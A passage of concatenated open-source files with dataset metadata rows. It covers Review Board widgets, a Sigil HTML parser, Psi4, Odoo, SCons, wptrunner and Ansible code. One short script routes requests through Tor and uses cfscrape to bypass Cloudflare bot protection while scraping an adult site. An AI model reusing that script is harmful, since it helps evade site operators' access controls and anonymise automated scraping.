new_range_start = timezone.make_aware(new_range_start, current_tz)
new_range_end = timezone.make_aware(new_range_end, current_tz)
response_data = {
"range_start": new_range_start.strftime("%Y-%m-%d"),
"range_end": new_range_end.strftime("%Y-%m-%d")
}
def large_stats_data(range_start, range_end):
def get_objects(model_name, timestamp_field, date_field):
"""Perform timestamp based queries.
This method receives a dynamic model name and performs a filter
query. Later the results are grouped by day and prepared for the
charting library.
"""
args = '%s__range' % timestamp_field
q = model_name.objects.filter(**{
args: (range_start, range_end)
})
q = q.extra({timestamp_field: date_field})
q = q.values(timestamp_field)
q = q.annotate(created_count=Count('pk'))
q = q.order_by(timestamp_field)
data = []
for obj in q:
data.append([
time.mktime(time.strptime(
six.text_type(obj[timestamp_field]),
"%Y-%m-%d")) * 1000,
obj['created_count']
])
return data
comment_array = get_objects(Comment, "timestamp", "date(timestamp)")
change_desc_array = get_objects(ChangeDescription, "timestamp",
"date(timestamp)")
review_array = get_objects(Review, "timestamp", "date(timestamp)")
rr_array = get_objects(ReviewRequest, "time_added", "date(time_added)")
return {
'change_descriptions': change_desc_array,
'comments': comment_array,
'reviews': review_array,
'review_requests': rr_array
}
stats_data = large_stats_data(new_range_start, new_range_end)
return {
"range": response_data,
"activity_data": stats_data
}
class ActivityGraphWidget(Widget):
"""Detailed database statistics graph widget.
Shows the latest database activity for multiple models in the form of
a graph that can be navigated by date.
This widget shows a daily view of creation activity for a list of models.
All displayed widget data is computed on demand, rather than up-front
during creation of the widget.
"""
widget_id = 'activity-graph-widget'
title = _('Review Board Activity')
size = Widget.LARGE
template = 'admin/widgets/w-stats-large.html'
actions = [
{
'label': '<',
'id': 'db-stats-graph-prev',
'rel': 'prev',
},
{
'label': '>',
'id': 'db-stats-graph-next',
'rel': 'next',
},
{
'label': _('Reviews'),
'classes': 'btn-s btn-s-checked',
'rel': 'reviews',
},
{
'label': _('Comments'),
'classes': 'btn-s btn-s-checked',
'rel': 'comments',
},
{
'label': _('Review Requests'),
'classes': 'btn-s btn-s-checked',
'rel': 'review_requests',
},
{
'label': _('Changes'),
'classes': 'btn-s btn-s-checked',
'rel': 'change_descriptions',
},
]
has_data = False
def init_widgets():
"""Initialize the widgets subsystem.
This will listen for events in order to manage the widget caches.
"""
post_save.connect(_increment_sync_num, sender=Group)
post_save.connect(_increment_sync_num, sender=Repository)
post_delete.connect(_increment_sync_num, sender=Group)
post_delete.connect(_increment_sync_num, sender=Repository)
def register_admin_widget(widget_cls, primary=False):
"""Register an administration widget.
This widget will appear in the list of primary or secondary widgets.
The widget class must have a widget_id attribute set, and can only
be registerd once in a single list. A KeyError will be thrown if
attempting to register a second time.
"""
widget_id = widget_cls.widget_id
if not widget_id:
raise ValueError('The widget_id attribute must be set on %r'
% widget_cls)
if widget_cls in primary_widgets or widget_cls in secondary_widgets:
raise KeyError('"%s" is already a registered administration widget'
% widget_id)
if primary:
primary_widgets.append(widget_cls)
else:
secondary_widgets.append(widget_cls)
def unregister_admin_widget(widget_cls):
"""Unregister a previously registered administration widget."""
widget_id = widget_cls.widget_id
try:
primary_widgets.remove(widget_cls)
except ValueError:
try:
secondary_widgets.remove(widget_cls)
except ValueError:
logging.error('Failed to unregister unknown administration '
'widget "%s".',
widget_id)
raise KeyError('"%s" is not a registered administration widget'
% widget_id)
# Register the built-in widgets
register_admin_widget(ActivityGraphWidget, True)
register_admin_widget(RepositoriesWidget, True)
register_admin_widget(UserActivityWidget, True)
register_admin_widget(ReviewRequestStatusesWidget)
register_admin_widget(RecentActionsWidget)
register_admin_widget(ReviewGroupsWidget)
register_admin_widget(ServerCacheWidget)
register_admin_widget(NewsWidget)
register_admin_widget(DatabaseStatsWidget)
| mit | 1,413,664,489,425,819,100 | 30.363002 | 79 | 0.583774 | false |
eli-schwartz/Sigil | src/Resource_Files/plugin_launchers/python/sigil_bs4/builder/_htmlparser.py | 6 | 9793 | from __future__ import unicode_literals, division, absolute_import, print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
text_type = str
binary_type = bytes
unicode = str
basestring = str
else:
range = xrange
text_type = unicode
binary_type = str
chr = unichr
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
if PY3:
from html.parser import HTMLParser
try:
from html.parser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
else:
from HTMLParser import HTMLParser
try:
from HTMLParser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
from sigil_bs4.element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from sigil_bs4.dammit import EntitySubstitution, UnicodeDammit
from sigil_bs4.builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
attr_dict = {}
for key, value in attrs:
# Change None attribute values to the empty string
# for consistency with the other tree builders.
if value is None:
value = ''
attr_dict[key] = value
attrvalue = '""'
self.soup.handle_starttag(name, None, None, attr_dict)
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed in all supported versions.
# http://bugs.python.org/issue13633
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
elif name.startswith('X'):
real_name = int(name.lstrip('X'), 16)
else:
real_name = int(name)
try:
data = chr(real_name)
except (ValueError, OverflowError) as e:
data = "\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
elif data == 'DOCTYPE':
# i.e. "<!DOCTYPE>"
data = ''
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
picklable = True
NAME = HTMLPARSER
features = [NAME, HTML, STRICT]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
kwargs['strict'] = False
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
kwargs['convert_charrefs'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None, exclude_encodings=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
yield (markup, None, None, False)
return
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
exclude_encodings=exclude_encodings)
yield (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError as e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 | -4,331,471,542,079,802,000 | 33.361404 | 318 | 0.579291 | false |
susilehtola/psi4 | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | 6 | 4102 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from psi4.driver import p4util
def collect_displaced_matrix_data(db, signature, row_dim):
"""
Gathers a list of tensors, one at each displaced geometry.
db: (database) the database object for this property calculation
signature: (string) The string that notifies the matrix reader that the
targeted tensor data begins.
row_dim: the expected number of rows that this value should be printed
across in the file
Returns a 2d list result[i][j]:
i: indexes displacements
j: indexes elements of the flattened tensor at some displacement
Throws: none
"""
result = []
for job in db['job_status']:
with open('{}/output.dat'.format(job)) as outfile:
result.append(parse_geometry_matrix_data(outfile, signature, row_dim))
return result
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
"""
Parses data from a 3 by n matrix printed to a file
outfile: ( file ) handle open in read mode, where the data should be found
matrix_name: ( string ) that indicates the matrix data is found on the lines
below
row_tot: ( int ) indicates the number of lines that the matrix data should
be printed across in the file
Returns: matrix_data a list of matrix elements, len = 3*row_tot
Throws: ParsingError (Collecting matrix data failed) if
It can't find matrix_header in the file.
It found matrix_header, but no data.
It found matrix_header, and data but the number of elements is
incorrect.
"""
collect_matrix = False
n_rows = 0
n_tries = 0
matrix_data = []
for line in outfile:
if matrix_name in line:
collect_matrix = True
if collect_matrix and (n_rows < row_tot):
try:
n_tries += 1
if n_tries > (row_tot + 13):
raise p4util.ParsingError('{} Matrix was unreadable. Scanned {}'
'lines.'.format(matrix_name, n_tries))
else:
(index, x, y, z) = line.split()
matrix_data.append(float(x))
matrix_data.append(float(y))
matrix_data.append(float(z))
n_rows += 1
except:
pass
if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
raise p4util.ParsingError('Collecting {} data failed!'
'\nExpected {} elements but only captured {}'.format(
matrix_name, 3 * row_tot, len(matrix_data)))
if len(matrix_data) == 3 * row_tot:
return matrix_data
raise p4util.ParsingError('data for {} was not found in the output file, '
'but it was marked for collection. Check output files '
'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
| lgpl-3.0 | -7,074,792,179,122,510,000 | 35.300885 | 84 | 0.62823 | false |
wangjun/odoo | openerp/addons/base/tests/test_menu.py | 501 | 1450 | import openerp.tests.common as common
class test_menu(common.TransactionCase):
def setUp(self):
super(test_menu,self).setUp()
self.Menus = self.registry('ir.ui.menu')
def test_00_menu_deletion(self):
"""Verify that menu deletion works properly when there are child menus, and those
are indeed made orphans"""
cr, uid, Menus = self.cr, self.uid, self.Menus
# Generic trick necessary for search() calls to avoid hidden menus
ctx = {'ir.ui.menu.full_list': True}
root_id = Menus.create(cr, uid, {'name': 'Test root'})
child1_id = Menus.create(cr, uid, {'name': 'Test child 1', 'parent_id': root_id})
child2_id = Menus.create(cr, uid, {'name': 'Test child 2', 'parent_id': root_id})
child21_id = Menus.create(cr, uid, {'name': 'Test child 2-1', 'parent_id': child2_id})
all_ids = [root_id, child1_id, child2_id, child21_id]
# delete and check that direct children are promoted to top-level
# cfr. explanation in menu.unlink()
Menus.unlink(cr, uid, [root_id])
remaining_ids = Menus.search(cr, uid, [('id', 'in', all_ids)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id, child21_id], remaining_ids)
orphan_ids = Menus.search(cr, uid, [('id', 'in', all_ids), ('parent_id', '=', False)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id], orphan_ids)
| agpl-3.0 | 6,516,303,362,321,979,000 | 44.3125 | 120 | 0.614483 | false |
angad/libjingle-mac | scons-2.2.0/engine/SCons/exitfuncs.py | 14 | 2436 | """SCons.exitfuncs
Register functions which are executed when SCons exits for any reason.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/exitfuncs.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
_exithandlers = []
def _run_exitfuncs():
"""run any registered exit functions
_exithandlers is traversed in reverse order so functions are executed
last in, first out.
"""
while _exithandlers:
func, targs, kargs = _exithandlers.pop()
func(*targs, **kargs)
def register(func, *targs, **kargs):
"""register a function to be executed upon normal program termination
func - function to be called at exit
targs - optional arguments to pass to func
kargs - optional keyword arguments to pass to func
"""
_exithandlers.append((func, targs, kargs))
import sys
try:
x = sys.exitfunc
# if x isn't our own exit func executive, assume it's another
# registered exit function - append it to our list...
if x != _run_exitfuncs:
register(x)
except AttributeError:
pass
# make our exit function get run by python when it exits:
sys.exitfunc = _run_exitfuncs
del sys
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause | 5,128,815,614,918,034,000 | 30.636364 | 107 | 0.724548 | false |
gpoesia/servo | tests/wpt/harness/wptrunner/manifestupdate.py | 116 | 17251 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditionals expressions in the manifest are
not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_expected is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
Result = namedtuple("Result", ["run_info", "status"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map[test_id]
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.updated_expected = []
self.new_expected = []
self.subtests = {}
self.default_status = None
self._from_file = True
@classmethod
def create(cls, test_type, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.split("/")[-1]
node = DataNode(name)
self = cls(node)
self.set("type", test_type)
self._from_file = False
return self
@property
def is_empty(self):
required_keys = set(["type"])
if set(self._data.keys()) != required_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
if self.default_status is not None:
assert self.default_status == result.default_expected
else:
self.default_status = result.default_expected
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated_expected:
if cond(run_info):
values.append(Result(run_info, result.status))
if result.status != cond.value:
self.root.modified = True
break
else:
# We didn't find a previous value for this
self.new_expected.append(Result(run_info, result.status))
self.root.modified = True
def coalesce_expected(self):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed."""
final_conditionals = []
try:
unconditional_status = self.get("expected")
except KeyError:
unconditional_status = self.default_status
for conditional_value, results in self.updated_expected:
if not results:
# The conditional didn't match anything in these runs so leave it alone
final_conditionals.append(conditional_value)
elif all(results[0].status == result.status for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.status == unconditional_status and
conditional_value.condition_node is not None):
self.remove_value("expected", conditional_value)
else:
conditional_value.value = result.status
final_conditionals.append(conditional_value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.remove_value("expected", conditional_value)
self.new_expected.extend(results)
elif conditional_value.condition_node is None:
self.new_expected.extend(result for result in results
if result.status != unconditional_status)
# It is an invariant that nothing in new_expected matches an existing
# condition except for the default condition
if self.new_expected:
if all(self.new_expected[0].status == result.status
for result in self.new_expected) and not self.updated_expected:
status = self.new_expected[0].status
if status != self.default_status:
self.set("expected", status, condition=None)
final_conditionals.append(self._data["expected"][-1])
else:
for conditional_node, status in group_conditionals(
self.new_expected,
property_order=self.root.property_order,
boolean_properties=self.root.boolean_properties):
if status != unconditional_status:
self.set("expected", status, condition=conditional_node.children[0])
final_conditionals.append(self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) > 0 and
self._data["expected"][-1].condition_node is None and
self._data["expected"][-1].value == self.default_status):
self.remove_value("expected", self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
break
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data == "expected":
self.updated_expected = []
for value in values:
self.updated_expected.append((value, []))
def clear_expected(self):
"""Clear all the expected data for this test and all of its subtests"""
self.updated_expected = []
if "expected" in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
del self._data["expected"]
break
for subtest in self.subtests.itervalues():
subtest.clear_expected()
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Result objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Results
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, status in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(status)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, status in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
continue
expr = make_expr(prop_set, status, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, status)
return conditions.values()
def make_expr(prop_set, status, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
root.append(StringNode(status))
return root
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 | 2,270,650,863,544,289,500 | 37.081678 | 92 | 0.607385 | false |
LorneWu/e-Gental-downloader | note tor_try_cloudflare_fail.py | 1 | 1111 | import socks
import socket
from urllib.request import urlopen
import requests
import header_s
import time
from bs4 import BeautifulSoup
socks.set_default_proxy(socks.SOCKS5, "localhost", 9050)
socket.socket = socks.socksocket
print(requests.get('http://icanhazip.com').text)
print(urlopen('http://icanhazip.com').read())
url = 'https://e-hentai.org/?f_doujinshi=1&f_manga=1&f_artistcg=1&f_gamecg=1&f_western=1&f_non-h=1&f_imageset=1&f_cosplay=1&f_asianporn=1&f_misc=1&f_search=Miyuko&f_apply=Apply+Filter'
header_s.getprofile()
import cfscrape
while True:
try:
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
print(scraper.get(url,headers = header_s.file_1))
html=scraper.get(url,headers = header_s.file_1)# requests.get(url,headers = header_s.file_1)
#print(html.text)
except Exception as e:
print(e)
else:
sp = BeautifulSoup(html.text,'html.parser')
print(sp.select('title'))
time.sleep(10) | gpl-3.0 | -138,625,734,406,110,530 | 33.75 | 184 | 0.70297 | false |
aperigault/ansible | lib/ansible/modules/cloud/amazon/ec2_metric_alarm.py | 11 | 12566 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: ec2_metric_alarm
short_description: "Create/update or delete AWS Cloudwatch 'metric alarms'"
description:
- Can create or delete AWS metric alarms.
- Metrics you wish to alarm on must already exist.
version_added: "1.6"
author: "Zacharie Eakin (@Zeekin)"
options:
state:
description:
- register or deregister the alarm
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for the alarm
required: true
metric:
description:
- Name of the monitored metric (e.g. CPUUtilization)
- Metric must already exist
required: false
namespace:
description:
